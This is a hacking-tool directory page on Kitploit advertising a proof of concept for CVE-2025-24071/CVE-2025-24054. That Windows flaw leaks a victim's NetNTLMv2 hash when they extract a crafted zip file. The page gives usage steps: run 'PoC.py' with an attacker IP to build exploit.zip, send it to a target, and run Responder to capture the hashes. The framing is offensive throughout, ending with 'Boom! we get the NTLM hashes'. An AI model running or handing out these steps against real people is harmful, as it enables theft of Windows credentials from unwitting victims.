Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-24071_PoC — A PoC of CVE-2025-24071 / CVE-2025-24054, A windows vulnerability that allow get NTMLv2 hashes | Kitploit
Tools/GitHubGitHub/marcejr117/cve-2025-24071_poc
Password CrackingPayload GenerationVulnerability AnalysisExploitationInformation Gathering
GitHubmarcejr117/cve-2025-24071_poc

CVE-2025-24071_PoC

A PoC of CVE-2025-24071 / CVE-2025-24054, A windows vulnerability that allow get NTMLv2 hashes

View Repository
2541 year agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
Website

CVE-2025-24071 / CVE-2025-24054 PoC

Edit: MICROSOFT HAS BEEN RENAMED CVE-2025-24071 AS CVE-2025-24054 🤔

Overview

This Windows vulnerability, specifically in 'explorer.exe', allows us to receive a NetNTLMv2 hash from a victim simply by having the attacker extract a .zip file.

Usage

  • Execute the script
root@kitploit:~
python PoC.py test 192.168.1.45

image

  • Send "exploit.zip" to the target, and then you can use Responder in order to recive the NTLMv2 hash
root@kitploit:~
sudo python3 responder.py -I ens33

image

  • Now when the target extract the file .zip, Boom! we get the NTLM hashes

til

Download Tool